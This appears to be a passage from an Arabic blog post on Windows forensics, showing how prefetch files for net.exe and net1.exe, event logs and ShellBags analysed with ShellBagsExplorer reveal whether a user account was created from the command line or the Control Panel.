قمت بالتواصل والدردشة مع هارلان (keydet89)، أحد أفضل الكتاب بمجال التحليل الجنائي الالكتروني في نظام الويندوز وسألته عن الأمر، فأخبرني أن أبحث وأتأكد من ملفات الـ prefetch (المزيد عنه لاحقاً في تديونة آخرى) الخاصة بكل من net.exe و net1.exe وتاريخ آخر تنفيذ لهما. حيث إنهما سوف يظهران قبل بداية إضافة المستخدم من سطر الأوامر (cmd.exe) بقليل من الوقت (إلا لو قام المخترق بالعمد بتأخير الأمر). هنا قمت بعمل إستخراج لكلا الملفين (prefetch) بواسطة FTK Imager ومن ثم أستخدمت أداة بسيطة كتبت بلغة بايثون لـ جين مايكل (jmichel_p) وذلك لتحليل الـ prefetch الخاص بـ net.exe و net1.exe.

من خلال النتائج الخاصة بملف NET.EXE prefetch، تبيين التالي:
net-prefetchمن خلال النتائج الخاصة بملف NET1.EXE prefetch، تبيين التالي:
net1-prefetch

الآن بعد القيام بربط الأحداث مع بعضها البعض:
1- نتائج الأحداث (السجلات)
2- نتائج ملفات Prefetch

يمكننا أن نفترض بإنه المستخدم الذي تم إنشاءه بتاريخ 2015-01-07 14:40:02، هو المستخدم الذي تم إضافته من سطر الأوامر (cmd.exe).

الآن وماذا عن المستخدم الذي تم إنشاءه من لوحة التحكم؟ هنا أقترح علي هارلان أن أتحقق من مداخل الـ ShellBags (المزيد عنه لاحقاً في تديونة آخرى) الخاصة بالمستخدم الذي قام بعملية الإنشاء للحسابات. هنا قلت مع نفسي إن هذه أفضل فرصة لتجربة أداة أريك (EricRZimmerman) والتي قام بالإنتهاء منها قبل فترة ليسطة بعيدة أسماها ShellBagsExplorer. يمكن تحميلها من هنا.

قمت كذلك بعملية سحب الملف UsrClass.dat الخاص بالمستخدم الذي قام بعملية الإنشاء (لا تنسى عزيزي القاريء يمكن معرفة من قام بذلك من السجلات نفسهم) ومن ثم قمت بتحليله من خلال الأداة التي ذكرتها ShellBagsExplorer. الأداة سهلة الإستخدام ورائعة للغاية وأنصح كل من يهتم بمجال التحقيقات الجنائية الالكترونية أن يقوم بتجربتها. الأداة قامت بتسهيل كل شيء من خلال عرض النتائج على شكل شجيري، ومن هناك وجدت إن المستخدم قام بتشغيل لوحة التحكم ومن ثم لوحة إدارة المستخدمين (User Accounts) في تاريخ 1/7/2015 2:40:20 pm، كما هو مبيين في الصورة أدناه:
sbe1-useraccountsمن خلال ذهابه الى هذه اللوحة قام بالذهاب من هناك الى صفحة إدارة الحسابات (Manage Accounts) بتاريخ 1/7/2015 2:40:22 pm، كما هو مبيين بالصورة أدناه:
sbe2-manageaccounts
بعد ذلك قام المستخدم بتشغيل صفحة إضافة مستخدم جديد (Create New Account)، حيث قام هو/هي بإضافة الحساب بتاريخ 1/7/2015 2:40:30 pm، كما هو مبيين في الصورة أدناه:
sbe3-createuser

الآن بعد القيام بربط الأحداث مع بعضها البعض، كما فعلنا سابقاً:
1- الاحداث التي وجدناها في برنامج Events Viewer
2- الاحداث التي وجدناها في ShellBags Explorer
تثبت بإنه المستخدم الثاني الذي تم إنشاءه بتاريخ 1/7/2015 4:40:30 pm، هو المستخدم الذي تم عمله من خلال لوحة التحكم GUI وليس من سطر الأوامر CLI.

كذلك لو قمنا بعمل تحليل زمني (timeline) لجميع ما تم ذكره، فإنه يمكننا تأكيد ما تم ذكره بالأعلى، وذلك لأننا سوف نجد تسلسلهم الزمني وراء بعض.

هذا كل ما لدي في هذا الموضوع، وإن شاء الله نلتقي مع مواضيع آخرى في هذا المجال في القريب العاجل.